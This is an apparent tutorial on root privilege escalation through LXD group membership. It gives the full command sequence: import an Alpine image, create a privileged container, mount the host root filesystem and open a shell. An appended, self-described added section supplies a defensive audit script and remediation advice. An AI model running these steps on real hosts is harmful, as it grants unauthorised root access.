How To Gain Root Privilege Escalation via LXD

Linux systems running LXD are vulnerable to privilege escalation via multiple attack paths. Privilege escalation via LXD has been a known issue on Ubuntu systems, and the method is simple: the only requirement for this exploit is access to a user account that is a member of the lxd group.

To check whether the user is part of the lxd group, simply run the id command.

The user is part of the lxd group, and the host in this case is running Ubuntu 18.04, which is vulnerable to lxd (searchsploit lxd), so we are going to download lxd-alpine-builder from https://github.com/saghul/lxd-alpine-builder.git and follow these steps.

On our machine, inside the lxd folder, we run:

sudo ./build-alpine

sudo ./build-alpine -h

Then on the host machine we run this:

lxc image import alpine-v3.3-x86_64-20160114_2308.tar.gz --alias myimage

lxc image list

lxc init myimage hacker -c security.privileged=true

lxc config device add hacker mydevice disk source=/ path=/mnt/root recursive=true

lxc start hacker

lxc exec hacker /bin/sh
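
The commands above work because lxd group membership allows creating a privileged container with the host's / attached as a disk device. To audit a host for that condition, the following added example (not part of the original post) lists lxd group members and flags disk devices whose source is the host root; the function names, user names, group line and device YAML are constructed for illustration.

```shell
#!/bin/sh
# Added audit example; the sample inputs below are constructed, not captured.
# Real use:  getent group lxd | lxd_group_members
#            lxc config device show NAME | host_root_devices
#            lxc config get NAME security.privileged   # "true" = privileged
# Note: these lxc commands show instance-local settings, not profile-inherited ones.

SAMPLE_GROUP='lxd:x:108:alice,bob'
SAMPLE_DEVICES='mydevice:
  path: /mnt/root
  recursive: "true"
  source: /
  type: disk
eth0:
  nictype: bridged
  parent: lxdbr0
  type: nic'

# Read group(5) lines on stdin; print each member of the lxd group, one per line.
lxd_group_members() {
    awk -F: '$1 == "lxd" && $4 != "" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) print m[i]
    }'
}

# Read device YAML on stdin; print each disk device whose source is the host "/".
host_root_devices() {
    awk '
        function report() { if (name != "" && type == "disk" && src == "/") print name }
        /^[^ ].*:$/  { report(); name = substr($0, 1, length($0) - 1); src = ""; type = "" }
        /^  source:/ { src = $2 }
        /^  type:/   { type = $2 }
        END          { report() }
    '
}

echo "Accounts that can drive LXD (treat as root-equivalent):"
printf '%s\n' "$SAMPLE_GROUP" | lxd_group_members | sed 's/^/  /'
echo "Disk devices exposing the host root filesystem:"
printf '%s\n' "$SAMPLE_DEVICES" | host_root_devices | sed 's/^/  /'
```

Any account the first check prints should be reviewed as if it had sudo rights, and removed from the lxd group if it does not need to manage containers.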
